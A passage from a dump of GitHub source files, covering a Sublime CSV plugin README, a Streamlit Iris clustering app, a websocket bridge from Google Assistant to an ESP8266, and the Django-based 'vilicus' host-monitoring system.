0. For a NumPy tutorial, see http://wiki.scipy.org/Tentative_NumPy_Tutorial.\n- `row` The row of the cell being evaluated.\n- `col` The column of the cell being evaluated.\n- `frow` The row of the formula.\n- `fcol` The column of the formula.\n\n## Examples\n\n### Example 1\n\nThis example applies a simple column sum using the NumPy `sum` method.\n\n\titem ,price\n\tshoes ,12\n\that ,2\n\tpants ,8\n\tshirt ,7.50\n\ttotal , ,\"<=m[1:5,1].sum()\"\n\n### Example 2\n\nThis example fills in totals by price and by item.\n\n\titem ,price ,qty ,total\n\tshoes ,12 ,2 ,\n\that ,2 ,1 ,\n\tpants ,8 ,1 ,\n\tshirt ,7.50 ,2 ,\n\ttotal , , ,\n\t\"[5,1:4]=m[1:5,col].sum()\"\n\t\"[1:5,3]=m[row,1]*m[row,2]\"\n\nNote that it must be evaluated (`Ctrl+Comma, Equals`) twice to calculate the last cell.\n\n# License\n\nAll of Sublime Text Advanced CSV Plugin is licensed under the MIT license.\n\nCopyright (c) 2014 Wade Brainerd <[email protected]>\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nFurther, portions of the code taken from Eric Martel's Sublime Text 2 plugin are licensed as follows:\n\nAll of Sublime Text 2 CSV Plugin is licensed under the MIT license.\n\nCopyright (c) 2012 Eric Martel <[email protected]>\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n" } ]
2
Kes-trel/Iris-Flower-Cluster-Analysis
https://github.com/Kes-trel/Iris-Flower-Cluster-Analysis
7bdb4f8ff66ed17c64f6dc8681ef3d813338b19b
6e0b67cf73b5cb0f2a148a8fe2f7542737b4814a
d797b105862e91f5d79e144304f15787185fb1c9
refs/heads/main
2023-05-26T21:01:31.274568
2021-06-18T14:50:56
2021-06-18T14:50:56
377,849,606
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7075919508934021, "alphanum_fraction": 0.7241992950439453, "avg_line_length": 45.20547866821289, "blob_id": "1e799e1879db0a24f1a82efea65492aa899a3dfc", "content_id": "f5ec90747dc1da86b4d74d6832e8ca9b1c78c648", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3375, "license_type": "no_license", "max_line_length": 248, "num_lines": 73, "path": "/app.py", "repo_name": "Kes-trel/Iris-Flower-Cluster-Analysis", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport streamlit as st\nimport seaborn as sns\nsns.set()\n\nfrom functions import screen_data, scater_plot, elbow_method, cluster_data, scale_cluster_data\n\nraw_data = pd.read_csv(\"iris_with_species.csv\")\n\nst.set_page_config(page_title=\"Species Segmentation with Cluster Analysis\",page_icon=\"🌼\", layout=\"wide\", initial_sidebar_state=\"auto\")\n\ncol_a, col_b = st.beta_columns([4,1])\ncol_a.title(\"Iris flower data set\")\ncol_a.header(\"Species Segmentation with Cluster Analysis (KMeans)\")\ncol_b.image(\"https://upload.wikimedia.org/wikipedia/commons/thumb/0/05/Scikit_learn_logo_small.svg/1200px-Scikit_learn_logo_small.svg.png\")\n\nshow_real_data = st.sidebar.checkbox(\"Show real data\", help=\"Test some clusters yourself first\")\n\nwidth = st.sidebar.slider(\"Plot width\", min_value=1, max_value=25, step=1, value=12, format=\"%i\")\nheight = st.sidebar.slider(\"Plot height\", min_value=1, max_value=25, step=1, value=5, format=\"%i\")\nplot_size = (width, height)\n\npetals_or_sepals = st.sidebar.radio(\"Select data for analysis\", [\"sepal\", \"petal\"])\n\nscale_data_box = st.sidebar.checkbox(\"Scale Data\", help=\"Standardize features by removing the mean and scaling to unit variance. For more info read here: https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.StandardScaler.html#\")\n\ntest_clusters = st.sidebar.number_input(\"Test clusters\", value=1, min_value=1, step=1, format=\"%i\")\n\n\ndata_screen = screen_data(data=raw_data, petal_sepal=petals_or_sepals)\n\nif scale_data_box:\n data = scale_cluster_data(data=data_screen, number_of_clusters=test_clusters)\nelse:\n data = cluster_data(data=data_screen, number_of_clusters=test_clusters)\n\nreal_results = raw_data.copy()\nreal_results[\"clusters\"] = real_results[\"species\"].map({\"setosa\":0, \"versicolor\":1 , \"virginica\":2})\n\nif show_real_data:\n col1, col2 = st.beta_columns(2)\n col1.subheader(\"Your analysis\")\n col1.pyplot(scater_plot(data=data, value=petals_or_sepals, size=plot_size))\n \n col2.subheader(\"Real data\")\n col2.pyplot(scater_plot(data=real_results, value=petals_or_sepals, size=plot_size))\nelse:\n st.pyplot(scater_plot(data=data, value=petals_or_sepals, size=plot_size))\n\nif st.sidebar.checkbox(\"Get a hint with Elbow Method\"):\n number_of_cluster_elbow = st.sidebar.number_input(\"Select number of cluster\", value=5, min_value=1, step=1, format=\"%i\", help=\"\"\"Cluster number keeps track the highest number of clusters we want to use the WCSS method for.\n More info https://en.wikipedia.org/wiki/Elbow_method_(clustering)\"\"\")\n\n st.pyplot(elbow_method(data=data, clusters=number_of_cluster_elbow, size=plot_size))\n\nconclusion = \"\"\"\n The original dataset has 3 sub-species of the Iris flower. Therefore, the number of clusters is 3.\n Read more here: https://en.wikipedia.org/wiki/Iris_flower_data_set\n \n This shows us that:\n\n * the Eblow method is imperfect (we might have opted for 2 or even 4 clusters)\n * k-means is very useful in moments where we already know the number of clusters - in this case: 3\n * biology cannot be always quantified \n \"\"\"\n\niris = \"https://upload.wikimedia.org/wikipedia/commons/thumb/4/41/Iris_versicolor_3.jpg/1280px-Iris_versicolor_3.jpg\"\n\nif show_real_data:\n with st.beta_expander(\"Iris flower data set\"):\n col_1, col_2 = st.beta_columns([2,1])\n col_1.write(conclusion)\n col_2.image(iris)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.7093023061752319, "avg_line_length": 16.399999618530273, "blob_id": "7a26f50eb9320e6705e1c178b56662da1079c676", "content_id": "6e60aaf3cec8f06b528a8fbed749192ee66c7f19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 86, "license_type": "no_license", "max_line_length": 20, "num_lines": 5, "path": "/requirements.txt", "repo_name": "Kes-trel/Iris-Flower-Cluster-Analysis", "src_encoding": "UTF-8", "text": "streamlit==0.82.0\npandas==1.2.4\nmatplotlib==3.4.2\nseaborn==0.11.1\nscikit-learn==0.24.2" }, { "alpha_fraction": 0.6384053826332092, "alphanum_fraction": 0.6423357725143433, "avg_line_length": 29.724138259887695, "blob_id": "352ef1fd95bc384a41cd50deceac545a68517db0", "content_id": "610d6c2145608daeeda4d350fef2dcdb49b30bd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 86, "num_lines": 58, "path": "/functions.py", "repo_name": "Kes-trel/Iris-Flower-Cluster-Analysis", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn import preprocessing\n\ndef screen_data(petal_sepal, data):\n data_select = data.copy()\n if petal_sepal == \"sepal\":\n data_select = data.iloc[:, :-3]\n return data_select\n elif petal_sepal == \"petal\":\n data_select = data.iloc[:, 2:-1]\n return data_select\n\ndef scater_plot(data, value, size):\n x_values = f\"{value}_length\"\n y_values = f\"{value}_width\"\n x_label = f\"Length of {value}\"\n y_label = f\"Width of {value}\"\n fig, ax = plt.subplots(figsize=size)\n if \"clusters\" in data.columns:\n ax.scatter(data[x_values], data[y_values], c=data[\"clusters\"], cmap=\"rainbow\")\n else:\n ax.scatter(data[x_values], data[y_values])\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n return fig\n\ndef elbow_method(clusters, data, size):\n wcss = list()\n for c in range(1, clusters+1):\n kmeans = KMeans(c)\n kmeans.fit(data)\n wcss_iter = kmeans.inertia_\n wcss.append(wcss_iter)\n fig, ax = plt.subplots(figsize=size)\n ax.plot(range(1, clusters+1), wcss)\n plt.title('The Elbow Method')\n plt.xlabel('Number of clusters')\n plt.ylabel('Within-cluster Sum of Squares')\n return fig\n\ndef cluster_data(number_of_clusters, data):\n data_c = data.copy()\n kmeans = KMeans(number_of_clusters)\n kmeans.fit(data_c)\n data_c[\"clusters\"] = kmeans.fit_predict(data_c)\n return data_c\n\ndef scale_cluster_data(number_of_clusters, data):\n scaler = preprocessing.StandardScaler()\n scaler.fit(data)\n data_scaled = scaler.transform(data)\n\n data_c = data.copy()\n kmeans = KMeans(number_of_clusters)\n kmeans.fit(data_scaled)\n data_c[\"clusters\"] = kmeans.fit_predict(data_scaled)\n return data_c" }, { "alpha_fraction": 0.8461538553237915, "alphanum_fraction": 0.8461538553237915, "avg_line_length": 31.5, "blob_id": "619ebe14fed18ae3ab57310b18f648ab4a81b72b", "content_id": "85698a06ff3c4a172545f3b10db7ba587e934b39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 65, "license_type": "no_license", "max_line_length": 33, "num_lines": 2, "path": "/README.md", "repo_name": "Kes-trel/Iris-Flower-Cluster-Analysis", "src_encoding": "UTF-8", "text": "# Iris-Flower-Cluster-Analysis\nSpecies segmentation using KMeans\n" } ]
4
Nishant147/Google-IOT
https://github.com/Nishant147/Google-IOT
efba30f46eee625454e883d1ddbf91d6261b20a7
d079bcfd2bd56955d979262475170cd237df7e93
f776a643188a5cb2c66d61e34a257a4410ee083c
refs/heads/master
2020-03-25T13:19:54.895521
2018-08-07T04:59:03
2018-08-07T04:59:03
143,819,841
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.760617733001709, "alphanum_fraction": 0.7760617733001709, "avg_line_length": 50.79999923706055, "blob_id": "444d85a0af965f68f6381a065f37aed2eb23a5e3", "content_id": "eb5dbf88134362bf537bca96dcf4312bcd3b65b7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 259, "license_type": "permissive", "max_line_length": 102, "num_lines": 5, "path": "/README.md", "repo_name": "Nishant147/Google-IOT", "src_encoding": "UTF-8", "text": "# Google-IOT\nPython Web app to communicate with Google Assistant API &amp; Websocket that communicates with ESP8266\n\nDeploy this project to Heroku by clicking this button\n [![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy)\n" }, { "alpha_fraction": 0.5589622855186462, "alphanum_fraction": 0.5627948045730591, "avg_line_length": 33.61224365234375, "blob_id": "281bd5c7cd8bdde8550b12dbc5fcf92f7231ead9", "content_id": "0dfef711153a7c516e6e9207b8537ff36e48630b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3392, "license_type": "permissive", "max_line_length": 105, "num_lines": 98, "path": "/app.py", "repo_name": "Nishant147/Google-IOT", "src_encoding": "UTF-8", "text": "import websockets\nimport asyncio\nimport json\nimport time, os\n\nclass HttpWSSProtocol(websockets.WebSocketServerProtocol):\n rwebsocket = None\n rddata = None\n async def handler(self):\n try:\n request_line, headers = await websockets.http.read_message(self.reader)\n method, path, version = request_line[:-2].decode().split(None, 2)\n #websockets.accept()\n except Exception as e:\n print(e.args)\n self.writer.close()\n self.ws_server.unregister(self)\n raise\n\n # TODO: Check headers etc. to see if we are to upgrade to WS.\n if path == '/ws':\n # HACK: Put the read data back, to continue with normal WS handling.\n self.reader.feed_data(bytes(request_line))\n self.reader.feed_data(headers.as_bytes().replace(b'\\n', b'\\r\\n'))\n\n return await super(HttpWSSProtocol, self).handler()\n else:\n try:\n return await self.http_handler(method, path, version)\n except Exception as e:\n print(e)\n finally:\n\n self.writer.close()\n self.ws_server.unregister(self)\n\n\n async def http_handler(self, method, path, version):\n response = ''\n try:\n googleRequest = self.reader._buffer.decode('utf-8')\n googleRequestJson = json.loads(googleRequest)\n\n #{\"location\": \"living\", \"state\": \"on\", \"device\": \"lights\"}\n if 'what' in googleRequestJson['result']['resolvedQuery']:\n ESPparameters = googleRequestJson['result']['parameters']\n ESPparameters['query'] = '?'\n else:\n ESPparameters = googleRequestJson['result']['parameters']\n ESPparameters['query'] = 'cmd'\n # send command to ESP over websocket\n if self.rwebsocket== None:\n print(\"Device is not connected!\")\n return\n await self.rwebsocket.send(json.dumps(ESPparameters))\n\n #wait for response and send it back to API.ai as is\n self.rddata = await self.rwebsocket.recv()\n #{\"speech\": \"It is working\", \"displayText\": \"It is working\"}\n print(self.rddata)\n state = json.loads(self.rddata)['state']\n self.rddata = '{\"speech\": \"It is turned '+state+'\", \"displayText\": \"It is turned '+state+'\"}'\n\n response = '\\r\\n'.join([\n 'HTTP/1.1 200 OK',\n 'Content-Type: text/json',\n '',\n ''+self.rddata+'',\n ])\n except Exception as e:\n print(e)\n self.writer.write(response.encode())\n\ndef updateData(data):\n HttpWSSProtocol.rddata = data\n\nasync def ws_handler(websocket, path):\n game_name = 'g1'\n try:\n HttpWSSProtocol.rwebsocket = websocket\n await websocket.send(json.dumps({'event': 'OK'}))\n data ='{\"empty\":\"empty\"}'\n while True:\n data = await websocket.recv()\n updateData(data)\n except Exception as e:\n print(e)\n finally:\n print(\"\")\n\n\n\nport = int(os.getenv('PORT', 5687))\nstart_server = websockets.serve(ws_handler, '', port, klass=HttpWSSProtocol)\n# logger.info('Listening on port %d', port)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n" } ]
2
sjkingo/vilicus
https://github.com/sjkingo/vilicus
b29859aa7729d41eb7a2baa5b669d1e5e8a092ad
597f1bf92f1f28b1910a82d4e4194c351c612eca
d89d6687df6d84104ca608eb4db32fec3fac4d98
refs/heads/master
2022-07-26T09:54:59.567697
2014-11-18T21:39:38
2014-11-18T21:39:38
14,829,085
1
0
null
2013-11-30T21:59:01
2018-03-24T17:50:29
2022-07-06T19:49:43
JavaScript
[ { "alpha_fraction": 0.6583054661750793, "alphanum_fraction": 0.6616499423980713, "avg_line_length": 25.776119232177734, "blob_id": "0316354f7380ada0a6ad894ba461c1971600f476", "content_id": "87cad221cebfb9d895c0edb96f2e2b39ef9485bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1794, "license_type": "no_license", "max_line_length": 69, "num_lines": 67, "path": "/manager/api/resources.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from tastypie import fields\nfrom tastypie.api import Api\nfrom tastypie.authorization import Authorization\nfrom tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS\nfrom tastypie.serializers import Serializer\n\nfrom manager.models import *\n\nv1_api = Api(api_name='v1')\n\nclass AgentResource(ModelResource):\n class Meta:\n queryset = Agent.objects.all()\n filtering = {\n 'id': ALL,\n }\n\n allowed_methods = ['get', 'put']\n authorization = Authorization()\n serializer = Serializer()\n\nv1_api.register(AgentResource())\n\nclass WindowsServiceResource(ModelResource):\n agent = fields.ForeignKey(AgentResource, 'agent')\n\n class Meta:\n queryset = WindowsService.objects.all()\n filtering = {\n 'agent': ALL_WITH_RELATIONS,\n }\n\n allowed_methods = ['get']\n authorization = Authorization()\n serializer = Serializer()\n\nv1_api.register(WindowsServiceResource())\n\nclass WindowsServiceLogResource(ModelResource):\n service = fields.ForeignKey(WindowsServiceResource, 'service')\n\n class Meta:\n queryset = WindowsServiceLog.objects.all()\n filtering = {\n 'service': ALL_WITH_RELATIONS,\n }\n\n allowed_methods = ['get', 'post']\n authorization = Authorization()\n serializer = Serializer()\n\nv1_api.register(WindowsServiceLogResource())\n\nclass PerformanceLogEntryResource(ModelResource):\n agent = fields.ForeignKey(AgentResource, 'agent')\n\n class Meta:\n queryset = PerformanceLogEntry.objects.all()\n filtering = {\n 'agent': ALL_WITH_RELATIONS,\n }\n\n allowed_methods = ['post']\n authorization = Authorization()\n serializer = Serializer()\n\nv1_api.register(PerformanceLogEntryResource())\n" }, { "alpha_fraction": 0.7899159789085388, "alphanum_fraction": 0.7899159789085388, "avg_line_length": 34.70000076293945, "blob_id": "56a4fadd8462eff3d5236fa56622530ccfc57bef", "content_id": "4f0ba89939a8e2f82d2fe37be287c77e4b4a0101", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 75, "num_lines": 10, "path": "/manager/signals.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "import datetime\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom manager.models import WindowsServiceLog\n\n@receiver(post_save, sender=WindowsServiceLog)\ndef update_last_checkin(sender, **kwargs):\n kwargs['instance'].service.agent.last_checkin = datetime.datetime.now()\n kwargs['instance'].service.agent.save()\n" }, { "alpha_fraction": 0.7190082669258118, "alphanum_fraction": 0.7190082669258118, "avg_line_length": 29.25, "blob_id": "1d567971781b98342c63219276c3dc4f6c99e16b", "content_id": "8b6227594b2207236f3c1389750aa7649c2b3b96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 121, "license_type": "no_license", "max_line_length": 89, "num_lines": 4, "path": "/agent/README.md", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "Vilicus Agents\n==============\n\nThe Windows agent for Vilicus is available at https://github.com/sjkingo/VilicusAgent-win\n" }, { "alpha_fraction": 0.5394191145896912, "alphanum_fraction": 0.7095435857772827, "avg_line_length": 17.538461685180664, "blob_id": "70f5853ecbdd78a62e11819d43d5550bcab25797", "content_id": "6c04362eeecf3531914567891f5407a13ff7447c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 241, "license_type": "no_license", "max_line_length": 27, "num_lines": 13, "path": "/requirements.txt", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "Django==1.7.1\ndefusedxml==0.4.1\ndjango-debug-toolbar==1.2.2\ndjango-grappelli==2.6.2\ndjango-tastypie==0.12.1\nlxml==3.4.0\nmimeparse==0.1.3\npsycopg2==2.5.4\npython-dateutil==2.2\npython-mimeparse==0.1.4\nsix==1.8.0\nsqlparse==0.1.13\nwsgiref==0.1.2\n" }, { "alpha_fraction": 0.6513994932174683, "alphanum_fraction": 0.6641221642494202, "avg_line_length": 29.153846740722656, "blob_id": "6760ba338f1ea8c0d30d1d377cf3aac976c72742", "content_id": "eb908bd23ab13a1d895b41ebe53105d1ecf00a04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 393, "license_type": "no_license", "max_line_length": 48, "num_lines": 13, "path": "/notify_pushover/models.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass PushoverUserTokens(models.Model):\n email = models.EmailField(max_length=254)\n token = models.CharField(max_length=30)\n description = models.TextField(blank=True)\n\n class Meta:\n verbose_name = 'Pushover user token'\n verbose_name_plural = verbose_name + 's'\n\n def __unicode__(self):\n return self.email + ': ' + self.token\n\n" }, { "alpha_fraction": 0.7794561982154846, "alphanum_fraction": 0.7794561982154846, "avg_line_length": 35.77777862548828, "blob_id": "efcb6d6a7a369994dbb44b9fa68ab045234cc7cb", "content_id": "04e5f2c97cd1e83d209daa4b7eba2e7b3988c10e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 102, "num_lines": 9, "path": "/notify_pushover/__init__.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\n\n_token_key = 'NOTIFY_PUSHOVER_API_TOKEN' \nif not hasattr(settings, _token_key):\n raise ImproperlyConfigured(_token_key + ' is missing but is required for the notify_pushover app')\nTOKEN_KEY = getattr(settings, _token_key)\n\nimport signals\n" }, { "alpha_fraction": 0.7851002812385559, "alphanum_fraction": 0.7851002812385559, "avg_line_length": 57.16666793823242, "blob_id": "93594cad0f2847ab083ed75291c1b94b5a1980f3", "content_id": "fedee63aba31b81d501e26f1e5e1a6ba5b51d389", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 349, "license_type": "no_license", "max_line_length": 95, "num_lines": 6, "path": "/notify_pushover/README.md", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "This app provides Android push notifications via the [Pushover](https://pushover.net/) service.\n\nYou need to add the `NOTIFY_PUSHOVER_API_TOKEN` configuration option to `local_settings.py` for\nthis to work, and register users in the `PushoverUser` model.\n\nMake sure you run `pip install -r notify_pushover/requirements.txt` to add the dependencies.\n" }, { "alpha_fraction": 0.5925925970077515, "alphanum_fraction": 0.5925925970077515, "avg_line_length": 19.25, "blob_id": "7a95ecee86303a9d1f6f073b859ea3b3d6396242", "content_id": "7ef4038257f1acd9b318358be4ba72d0b26f095d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 243, "license_type": "no_license", "max_line_length": 48, "num_lines": 12, "path": "/dashboard/static/js/dashboard.js", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "$(document).ready(function() {\n\n$('div.summary').click(function() {\n $(this).next().slideToggle();\n $(this).toggleClass('selected');\n});\n\n$('a.click-collapse').click(function() {\n $(this).parents('div.detail').slideToggle();\n});\n\n});\n" }, { "alpha_fraction": 0.6673095226287842, "alphanum_fraction": 0.6692382097244263, "avg_line_length": 38.88461685180664, "blob_id": "b17be993c800d50828e502a01c2f62afe34cf41a", "content_id": "9c70eb18b727f6b8efc5692564861f36942827d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1037, "license_type": "no_license", "max_line_length": 114, "num_lines": 26, "path": "/notify_pushover/signals.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom manager.models import WindowsServiceLog\nfrom send import *\n\nclass LastStatusDummy(object):\n actual_status = '(None)'\n\n@receiver(post_save, sender=WindowsServiceLog)\ndef log_post_save(sender, **kwargs):\n inst = kwargs['instance']\n if inst.service.changed_since_last:\n status_now = inst.service.latest_log_entries[0]\n try:\n last_status = inst.service.latest_log_entries[1]\n except IndexError:\n last_status = LastStatusDummy()\n\n title = '{name} is now {now}'.format(name=inst.service, now=status_now.actual_status)\n msg = 'The service {name} running on {agent} has just changed status from {last} -> {now} at {dt}'.format(\n name=inst.service, agent=inst.service.agent.hostname, \n last=last_status.actual_status, now=status_now.actual_status,\n dt=status_now.timestamp)\n\n send_push_notification(title, msg, priority=PRIORITY['HIGH'])\n" }, { "alpha_fraction": 0.6733524203300476, "alphanum_fraction": 0.6790831089019775, "avg_line_length": 25.846153259277344, "blob_id": "623902a9b9df7c12c26619123307807de908b73e", "content_id": "1e2ed0cfb724bf5012a4495e8dfec0da58fc87ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 349, "license_type": "no_license", "max_line_length": 51, "num_lines": 13, "path": "/vilicus/urls.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom manager.api.resources import v1_api\n\nurlpatterns = patterns('',\n (r'^grappelli/', include('grappelli.urls')),\n (r'^admin/', include(admin.site.urls)),\n (r'^api/', include(v1_api.urls)),\n (r'^', include('dashboard.urls')),\n)\n" }, { "alpha_fraction": 0.572519063949585, "alphanum_fraction": 0.576793909072876, "avg_line_length": 37.988094329833984, "blob_id": "447b9b682c9693eedf21953bc0bbcd12e42afc34", "content_id": "5733e9802b034c928dbbdd879f8a8476d2d1e64a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3275, "license_type": "no_license", "max_line_length": 105, "num_lines": 84, "path": "/README.md", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "vilicus - A Python network and host monitoring system\n=====================================================\n\nvilicus is a system designed to monitor and alert to problems with network\ninfrastructure and hosts. For example it can notify when a process is no longer\nrunning, or monitor the CPU utilisation of a machine and alert if it is\nsustained above a threshold.\n\nIt can be compared to bigger tools such as Nagios and NetXMS, but on a far\nsmaller scale. \n\nIt supports Android push notifications via the Pushover service.\n\nTerminology\n-----------\n\n- *check*: a check is a configured object to monitor, such as a running process or a CPU\nthreshold.\n\n- *server*: the netmon server runs with a database backend and exposes an API for agents to\ncontact and report on configured checks.\n\n- *agent*: an agent runs on each host to be monitored and reports back to the server with details of\nits configured checks.\n\nArchitecture/design\n-------------------\n\nEach agent is completely stateless, getting most of its configuration and all\nof its configured checks from the server at statup. This means its footprint is\ntiny and requires only minimal dependencies.\n\nHere is a simplified diagram of how the system works;\n\n```\n\n +--------+ 4. server sends notifications if needed +-----------------+\n /--------------------------> | server | ------------------------------------------> | email to admins |\n | +--------+ +-----------------+\n | |\n | | 1. agent contacts server and\n | | and downloads list of all\n | 3. agent submits result | configured checks for itself\n | of checks to server |\n | and \"checks in\", +-------+ 2. agent runs checks +---------------------+\n | meaning it has | agent | <-------------------------> | is process running? |\n | completed its checks +-------+ +---------------------+\n | |\n | |\n | |\n \\-------------------------------/\n\n```\n\nCommunication between agents and server is done via\n[REST](https://en.wikipedia.org/wiki/Representational_state_transfer) requests.\nSince it uses HTTP, an agent and the server can be on the same machine, on the\nsame network, or across the Internet. An agent simply requires HTTP access over\nport 80 to the server. A sample of the interaction between agent and server is\ngiven below:\n\n```\n GET /api/v1/agent/\n ^ fetch the agent object (this also verifies access)\n\n GET /api/v1/process_check/\n ^ get a list of this agent's process checks\n\n POST /api/v1/check_history/\n POST /api/v1/check_history/\n POST /api/v1/check_history/\n ^ post the results back to the server, one for each check (3 are configured)\n\n PUT /api/v1/agent/1/\n ^ checkout - signal to the server the agent has finished its checks for this run\n```\n\nThe server never contacts any of its agents, rather each agent contacts the\nserver as it is assumed to be at a fixed address.\n\nDependencies\n------------\n\n- Server: see [requirements.txt](requirements.txt)\n" }, { "alpha_fraction": 0.730434775352478, "alphanum_fraction": 0.730434775352478, "avg_line_length": 27.75, "blob_id": "b9d7c4c27435b4317359d2401eec42b5a2489838", "content_id": "8cc794af9d1597fa11e8ea08672be1db36203700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 230, "license_type": "no_license", "max_line_length": 50, "num_lines": 8, "path": "/dashboard/views.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\nfrom manager.models import *\n\ndef dashboard(request, template='dashboard.html'):\n agents = Agent.objects.all()\n context = {'agents': agents}\n return render(request, template, context)\n" }, { "alpha_fraction": 0.5763813853263855, "alphanum_fraction": 0.5839653015136719, "avg_line_length": 26.969696044921875, "blob_id": "ea050d44d738cf82d7e3ff481a9e6bbe59e405a5", "content_id": "d7708d72a446c212e6ed590ff05971513a4d14ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 923, "license_type": "no_license", "max_line_length": 97, "num_lines": 33, "path": "/chartjs/templatetags/chartjs.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django import template\nfrom django.utils.safestring import mark_safe\n\nregister = template.Library()\n\ndef jsify_list(python_list):\n assert type(python_list) == list\n\n r = '['\n for i, entry in enumerate(python_list):\n if type(entry) == int:\n e = str(entry)\n else:\n e = '\"' + entry + '\"'\n if i+1 != len(python_list):\n e += ', '\n r += e\n r += ']'\n\n return mark_safe(r)\n\[email protected]_tag('chartjs/line_chart.html')\ndef line_chart(canvas_id, chart_config=None, width='400', height='400'):\n if chart_config is None:\n raise template.TemplateSyntaxError('chart_config argument must be provided and not None')\n\n return {\n 'canvas_id': canvas_id,\n 'canvas_width': width,\n 'canvas_height': height,\n 'labels': jsify_list(chart_config['xaxis']),\n 'dataset': jsify_list(chart_config['dataset']),\n }\n" }, { "alpha_fraction": 0.5877437591552734, "alphanum_fraction": 0.6169916391372681, "avg_line_length": 26.615385055541992, "blob_id": "2ef4118cd9fc76e4b621095bbfdae83b39869eb1", "content_id": "92088c4483e1f054d3ad7674a6f82f3393e3c2da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 718, "license_type": "no_license", "max_line_length": 77, "num_lines": 